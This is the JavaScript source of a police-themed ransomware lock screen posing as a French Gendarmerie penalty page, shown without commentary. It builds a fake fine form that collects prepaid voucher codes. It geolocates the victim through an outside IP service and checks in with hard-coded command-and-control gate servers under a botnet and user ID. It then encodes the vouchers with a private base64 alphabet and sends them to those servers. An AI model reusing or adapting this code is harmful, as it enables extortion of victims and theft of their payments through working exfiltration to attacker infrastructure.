CyberCrime: Rançongiciel - Gendarmerie Nationale

1. /*
2. * Global variables
3.  */
4. var debug = false;
5. var debug_ec = false;
6.  
7. if (debug || debug_ec)
8. {
9.     alert("DEBUG! DEBUG! DEBUG!");
10.     document.getElementById("v3").value = "1";
11. }
12.  
13. var penalty_amount = 200;
14. var g_botnet = "fr1";
15. var g_os_version = "Unknown";
16. var g_userid = "0";
17.  
18. var RESPONSE_PONG = "Pong!";
19. var RESPONSE_OK = "OK";
20. var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
21. var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
22. var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";
23.  
24. if (debug)
25. {
26.     g_gates = [
27.         "http://lck-test.net/gate.php",
28.         "http://lck-test4.net/gate.php", // not exists
29.         "http://lck-test1.net/gate.php",
30.         "http://lck-test2.net/gate.php",
31.         "http://lck-test3.net/gate.php"
32.         ]
33. }
34. else
35. {
36.     g_gates = [
37.         "http://bundespol.com/gate.php",
38.         "http://yycqparxvohd.com/gate.php",
39.         "http://wzuoqliyknpz.com/gate.php"
40.         ]
41. }
42.  
43. var positions_count = 1;
44.  
45. var g_state = new Object();
46. g_state.geo_location_lock = false;
47. g_state.geo_location_set = false;
48. g_state.report_lock = false;
49. g_state.report = "";
50. g_state.report_sent = true;
51. g_state.gate_selector_lock = false;
52. g_state.gate_selector_gate_works = true;
53. g_state.gate_selector_calls_count = 999999;
54. g_state.gate_selector_gate_index = 0;
55. g_state.os_version_set = false;
56. g_state.userid_set = false;
57.  
58. g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
59. g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";
60.  
61. function print_g_state()
62. {
63.     if (debug_ec)
64.     {
65.         console.log("dump of g_state:")
66.         console.log("\tg_state.geo_location_lock: %s", g_state.geo_location_lock ? "true" : "false");
67.         console.log("\tg_state.geo_location_set: %s", g_state.geo_location_set ? "true" : "false");
68.         console.log("\tg_state.report_lock: %s", g_state.report_lock ? "true" : "false");
69.         console.log("\tg_state.report: %s", g_state.report);
70.         console.log("\tg_state.report_sent: %s", g_state.report_sent ? "true" : "false");
71.         console.log("\tg_state.gate_selector_lock: %s", g_state.gate_selector_lock ? "true" : "false");
72.         console.log("\tg_state.gate_selector_gate_works: %s", g_state.gate_selector_gate_works ? "true" : "false");
73.         console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
74.         console.log("\tg_state.gate_selector_gate_index: %d (%s)", g_state.gate_selector_gate_index, g_gates[g_state.gate_selector_gate_index]);
75.         console.log("===================================================================================================");
76.     }
77. }
78.  
79. function base64_encode(input, key)
80. {
81.     var output = "";
82.     var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
83.     var i = 0;
84.  
85.     while (i < input.length)
86.     {
87.         chr1 = input.charCodeAt(i++);
88.         chr2 = input.charCodeAt(i++);
89.         chr3 = input.charCodeAt(i++);
90.  
91.         enc1 = chr1 >> 2;
92.         enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
93.         enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
94.         enc4 = chr3 & 63;
95.  
96.         if (isNaN(chr2))
97.         {
98.             enc3 = enc4 = 64;
99.         }
100.         else if (isNaN(chr3))
101.         {
102.             enc4 = 64;
103.         }
104.  
105.         output = output +
106.             key.charAt(enc1) + key.charAt(enc2) +
107.             key.charAt(enc3) + key.charAt(enc4);
108.     }
109.  
110.     return output;
111. }
112.  
113. /*
114.  * multitab window's tabs switcher
115.  */
116. function switch_tab(content_tab_id, content_id)
117. {
118.     document.getElementById('vouchers_info_tab').className = 'close';
119.     document.getElementById('penalty_form_tab').className = 'close';
120.     document.getElementById(content_tab_id).className = 'open';
121.  
122.     document.getElementById('vouchers_info').style.display = 'none';
123.     document.getElementById('penalty_form').style.display = 'none';
124.     document.getElementById(content_id).style.display = 'block';
125.     return;
126. }
127.  
128.  
129. /*
130. * Text input filter
131. */
132.  
133. (function()
134. {   // after loading document init function will be called
135.     if (window.addEventListener)
136.         window.addEventListener("load", init, false);
137.     else if (window.attachEvent)
138.         window.attachEvent("onload", init);
139.  
140. })();
141.  
142. function register_handler(id)
143. {
144.     // register handler function
145.     if (id.addEventListener)
146.     {
147.         id.addEventListener("keypress", filter, false);
148.     }
149.     else
150.     {
151.         id.onkeypress = filter;
152.     }
153.  
154.     return;
155. }
156.  
157. // Find all <input> tags, for which necessary to register event handler
158. function init()
159. {
160.     var inputtags = document.getElementsByTagName("input");
161.     for(var i = 0; i < inputtags.length; i++) // traverse all tags
162.     {
163.         var tag = inputtags[i];
164.         if (tag.type != "text") continue; // only text fields
165.         var allowed = tag.getAttribute("allowed");
166.         if (!allowed) continue; // and only if presents attribute 'allowed'
167.         // register handler function
168.         register_handler(tag);
169.     }
170. }
171.  
172. // This is event 'keypress' handler, which maintains input filtration.
173. function filter(event)
174. {
175.     // Get event object and character code by portable way
176.     var e = event || window.event; // Keyboard event object
177.     var code = e.charCode || e.keyCode; // What key pressed
178.  
179.     // If pressed functional key do not filter it
180.     if (e.charCode == 0) return true; // Functional key (FF only)
181.     if (e.ctrlKey || e.altKey) return true; // Pressed Ctrl or Alt
182.     if (code < 32) return true; // ctrl ASCII code
183.  
184.     // Now get information from input element
185.     var allowed = this.getAttribute("allowed"); // Allowed characters
186.     var errorClassName = this.getAttribute("errorclass"); // class name indicating error
187.     var successClassName = this.getAttribute("successclass"); // class name indicating success
188.  
189.     // Translate key code to character
190.     var c = String.fromCharCode(code);
191.  
192.     // Check whether character in allowed characters list or not
193.     if (allowed.indexOf(c) != -1)
194.     {
195.         // character c is allowed
196.         this.className = successClassName;
197.         return true; // Accept input
198.     }
199.     else
200.     {
201.         // character c is not allowed
202.         this.className = errorClassName;
203.         // Prevent input
204.         if (e.preventDefault) e.preventDefault();
205.         if (e.returnValue) e.returnValue = false;
206.         return false;
207.     }
208. }
209.  
210. /*
211. * End of text input filter
212.  */
213.  
214.  
215.  
216. /*
217. * penalty form support code
218.  */
219. function get_position_number_html(position_number)
220. {
221.     return "" + (position_number * 1 + 1);
222. }
223.  
224. function get_voucher_code_html(position_number)
225. {
226.     return "<input id='voucher_code" + position_number + "' type='text' size='25' maxlength='19' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder'>";
227. }
228.  
229. function get_voucher_value_html(position_number)
230. {
231.     return "<input id='voucher_value" + position_number + "' type='text' size='14' maxlength='3' value='0' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder' onkeyup='refresh_total()'>";
232. }
233.  
234. function get_img_minus_html(position_number)
235. {
236.     return position_number <= 0 ? "" : "<img src='minus.png' alt='' onclick='delete_voucher_position(" + position_number + ")'>";
237. }
238.  
239. function add_voucher_position()
240. {
241.     var position_number = positions_count;
242.     positions_count++;
243.  
244.     var newrow = document.all.penalty.insertRow(position_number + 1);
245.     var newcell = newrow.insertCell(0);
246.     newcell.innerHTML = get_position_number_html(position_number);
247.     newcell = newrow.insertCell(1);
248.     newcell.innerHTML = get_voucher_code_html(position_number);
249.     newcell = newrow.insertCell(2);
250.     newcell.innerHTML = get_voucher_value_html(position_number);
251.     newcell = newrow.insertCell(3);
252.     newcell.innerHTML = get_img_minus_html(position_number);
253.  
254.     register_handler(document.getElementById("voucher_code"+position_number));
255.     register_handler(document.getElementById("voucher_value"+position_number));
256.  
257.     return;
258. }
259.  
260. function delete_voucher_position(position_number)
261. {
262.     var i, j;
263.     var vouchers = new Array();
264.     var values = new Array();
265.     var total_amount;
266.  
267.     for(i = 0, j = 0; i < positions_count; i++)
268.     {
269.         if (i != position_number)
270.         {
271.             vouchers[j] = document.getElementById("voucher_code"+i).value;
272.             values[j] = document.getElementById("voucher_value"+i).value;
273.             j++;
274.         }
275.     }
276.  
277.     for(i = 0; i < positions_count; i++)
278.     {
279.         document.all.penalty.deleteRow(1);
280.     }
281.    
282.     positions_count--;
283.  
284.     for(i = 0; i < positions_count; i++)
285.     {
286.         var newrow = document.all.penalty.insertRow(i + 1);
287.         var newcell = newrow.insertCell(0);
288.         newcell.innerHTML = get_position_number_html(i);
289.         newcell = newrow.insertCell(1);
290.         newcell.innerHTML = get_voucher_code_html(i);
291.         newcell = newrow.insertCell(2);
292.         newcell.innerHTML = get_voucher_value_html(i);
293.         newcell = newrow.insertCell(3);
294.         newcell.innerHTML = get_img_minus_html(i);
295.     }
296.  
297.     for(i = 0; i < positions_count; i++)
298.     {
299.         document.getElementById("voucher_code"+i).value = vouchers[i];
300.         document.getElementById("voucher_value"+i).value = values[i];
301.         register_handler(document.getElementById("voucher_code"+i));
302.         register_handler(document.getElementById("voucher_value"+i));
303.     }
304.  
305.     total_amount = 0;
306.     for(i = 0; i < positions_count; i++)
307.     {
308.         total_amount += values[i] * 1;
309.     }
310.     document.getElementById("total_amount").innerHTML = total_amount;
311.  
312.     return;
313. }
314.  
315. function refresh_total()
316. {
317.     var total_amount = 0;
318.     for(var i = 0; i < positions_count; i++)
319.     {
320.         total_amount += document.getElementById("voucher_value"+i).value * 1;
321.     }
322.     document.getElementById("total_amount").innerHTML = total_amount;
323.  
324.     var do_pay = document.getElementById("do_pay");
325.     //do_pay.disabled = total_amount < penalty_amount ? 'disabled' : '';
326.     do_pay.disabled = '';
327.  
328.     return total_amount;
329. }
330.  
331. /*
332. * End of penalty form support code
333.  */
334.  
335.  
336. /*
337. * Geoip code
338.  */
339. function http_new_request()
340. {
341.     if(typeof XMLHttpRequest != "undefined")
342.     {
343.         return new XMLHttpRequest();
344.     }
345.     else if(window.ActiveXObject)
346.     {
347.         var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
348.         for (var i = 0; i < aVersions.length; i++)
349.         {
350.             try
351.             {
352.                 return new ActiveXObject(aVersions[i]);
353.             }
354.             catch (e) {}
355.         }
356.     }
357. }
358.  
359. function http_get(target, callback, options)
360. {
361.     var request = http_new_request();
362.     var timer;
363.  
364.     if (options.timeout)
365.     {
366.         timer = setTimeout(
367.             function()
368.             {
369.                 request.abort();
370.                 if (options.timeoutHandler)
371.                     options.timeoutHandler(target);
372.             },
373.             options.timeout
374.             )
375.     }
376.  
377.     request.onreadystatechange = function()
378.     {
379.         if (request.readyState == 4)
380.         {
381.             if (timer) clearTimeout(timer);
382.             if (request.status == 200)
383.             {
384.                 callback(request.responseText);
385.             }
386.             else
387.             {
388.                 if (options.errorHandler) options.errorHandler(request.status, request.statusText);
389.                 else callback(null);
390.             }
391.         }
392.     }
393.  
394.     try
395.     {
396.         request.open("GET", target, true);
397.         request.send(null);
398.     }
399.  
400.     catch (e) {
401.     }
402. }
403.  
404. function set_geo_location()
405. {
406.     var options = new Object();
407.  
408.     function cb_set_geo_location(response_text)
409.     {
410.         try
411.         {
412.             if (response_text == null)
413.             {
414.                 g_state.geo_location_set = false;
415.             }
416.             else
417.             {
418.                 var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
419.                 var s_ip = response_text.match(re)[2].toString();
420.                 re = /ISP:(.*?)<b>(.*?)<\/b>/i;
421.                 var s_isp = response_text.match(re)[2].toString();
422.                 re = /City:(.*?)<b>(.*)<\/b>/i;
423.                 var s_city = response_text.match(re)[2].toString();
424.                 if (s_ip == "")
425.                 {
426.                     s_ip = "188.28.11.121";
427.                 }
428.                 document.getElementById("v_ip").innerHTML = s_ip;
429.                 document.getElementById("v_city").innerHTML = s_city;
430.                 document.getElementById("v_isp").innerHTML = s_isp;
431.                 g_state.geo_location_set = true;
432.             }
433.         }
434.  
435.         catch (e) {}
436.  
437.         finally
438.         {
439.             g_state.geo_location_lock = false;
440.         }
441.     }
442.  
443.     function cb_set_geo_location_timeout(target)
444.     {
445.         g_state.geo_location_set = false;
446.         g_state.geo_location_lock = false;
447.     }
448.  
449.     if (!g_state.geo_location_set && !g_state.geo_location_lock)
450.     {
451.         g_state.geo_location_lock = true;
452.         options.timeout = 3000;
453.         options.timeoutHandler = cb_set_geo_location_timeout;
454.         http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
455.     }
456. }
457.  
458. function select_gate()
459. {
460.     var options = new Object();
461.    
462.     function cb_select_gate(response_text)
463.     {
464.         if (response_text == RESPONSE_PONG)
465.         {
466.             g_state.gate_selector_gate_works = true;
467.             g_state.gate_selector_calls_count = 0;
468.             if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
469.         }
470.         else
471.         {
472.             g_state.gate_selector_gate_works = false;
473.             if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
474.         }
475.         g_state.gate_selector_lock = false;
476.     }
477.  
478.     function cb_select_gate_timeout(target)
479.     {
480.         g_state.gate_selector_gate_works = false;
481.         g_state.gate_selector_lock = false;
482.         if (debug_ec) console.log("Pinging gate %s was timeout.");
483.     }
484.  
485.     if (!g_state.gate_selector_lock && g_state.userid_set)
486.     {
487.         if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
488.         {
489.             g_state.gate_selector_lock = true;
490.             if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);
491.  
492.             if (!g_state.gate_selector_gate_works)
493.             {
494.                 g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
495.             }
496.  
497.             options.timeout = 5000;
498.             options.timeoutHandler = cb_select_gate_timeout;
499.             var os_version = base64_encode(g_os_version, g_base64_std_key);
500.             http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
501.         }
502.     }
503. }
504.  
505. function send_report()
506. {
507.     var options = new Object();
508.    
509.     function cb_send_report(response_text)
510.     {
511.         if (response_text != RESPONSE_OK)
512.         {
513.             g_state.gate_selector_gate_works = false;
514.             g_state.report_sent = false;
515.             if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
516.         }
517.         else
518.         {
519.             if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
520.         }
521.         g_state.report_lock = false;
522.     }
523.  
524.     function cb_send_report_timeout(target)
525.     {
526.         g_state.gate_selector_gate_works = false;
527.         g_state.report_lock = false;
528.         if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
529.     }
530.  
531.     if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
532.     {
533.         g_state.report_lock = true;
534.         if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
535.         // set 'report_sent = true' here to prevent overwriting this flag in
536.         // moment between changing report value and calling cb_send_report()
537.         g_state.report_sent = true;
538.         options.timeout = 5000;
539.         options.timeoutHandler = cb_send_report_timeout;
540.         http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
541.     }
542. }
543.  
544. function set_os_version()
545. {
546.     if (g_state.os_version_set) return;
547.  
548.     var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");
549.     var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");
550.     var os = "";
551.  
552.     for (var i = 0; i < iOS.length; i++)
553.     {
554.         if (navigator.userAgent.indexOf(iOS[i]) > -1)
555.         {
556.             os = oOS[i];
557.             break;
558.         }
559.     }
560.  
561.     g_os_version = os;
562.     document.getElementById("v_os").innerHTML = os;
563.     g_state.os_version_set = true;
564.     if (debug_ec) console.log("OS version set successfully.");
565. }
566.  
567. function set_userid()
568. {
569.     if (g_state.userid_set) return;
570.  
571.     g_userid = document.getElementById("v3").value;
572.     if (g_userid != "0")
573.     {
574.         g_state.userid_set = true;
575.         if (debug_ec) console.log("Userid set successfully.");
576.     }
577. }
578.  
579. function monitor()
580. {
581.     refresh_total();
582.     set_geo_location();
583.     set_os_version();
584.     set_userid();
585.     select_gate();
586.     send_report();
587. }
588.  
589. window.onload = function ()
590. {
591.     setInterval(monitor, 1000);
592. }
593.  
594. function are_vouchers_valid()
595. {
596.     var prefix;
597.     var is_valid = true;
598.     var ret = true;
599.  
600.     for(var i = 0; i < positions_count; i++)
601.     {
602.         var voucher_code = document.getElementById("voucher_code"+i);
603.         var voucher = voucher_code.value;
604.         if (voucher.length == 19)
605.         {
606.             prefix = voucher.substr(0, 6);
607.             if (prefix != "633718")
608.             {
609.                 is_valid = false;
610.             }
611.         }
612.         else if (voucher.length == 16)
613.         {
614.             prefix = voucher.substr(0, 1);
615.             if (prefix != "0")
616.             {
617.                 is_valid = false;
618.             }
619.         }
620.         else
621.         {
622.             is_valid = false;
623.         }
624.  
625.         if (is_valid)
626.         {
627.             voucher_code.className = voucher_code.getAttribute("successclass");
628.         }
629.         else
630.         {
631.             voucher_code.className = voucher_code.getAttribute("errorclass");
632.             ret = false;
633.         }
634.     }
635.  
636.     return ret;
637. }
638.  
639. function send_vouchers()
640. {
641.     var report = "";
642.  
643.     if (!are_vouchers_valid())
644.     {
645.         alert(MSG_WRONG_VOUCHERS);
646.         return;
647.     }
648.  
649.     var total = refresh_total();
650.     if (total < penalty_amount)
651.     {
652.         alert(MSG_LOW_TOTAL);
653.         return;
654.     }
655.  
656.     for(var i = 0; i < positions_count; i++)
657.     {
658.         var voucher = document.getElementById("voucher_code"+i).value;
659.         var value = document.getElementById("voucher_value"+i).value;
660.         report += report.length ? "x" : "";
661.         report += voucher + "-" + value;
662.     }
663.  
664.     if (report.length > 16)
665.     {
666.         report = base64_encode(report, g_base64_priv_key);
667.         if (g_state.report != report)
668.         {
669.             g_state.report = report;
670.             g_state.report_sent = false;
671.             if (debug_ec) console.log("Report updated and wait sending.");
672.         }
673.     }
674.  
675.     alert(MSG_VOUCHERS_SENT);
676.     return;
677. }
678.  
679.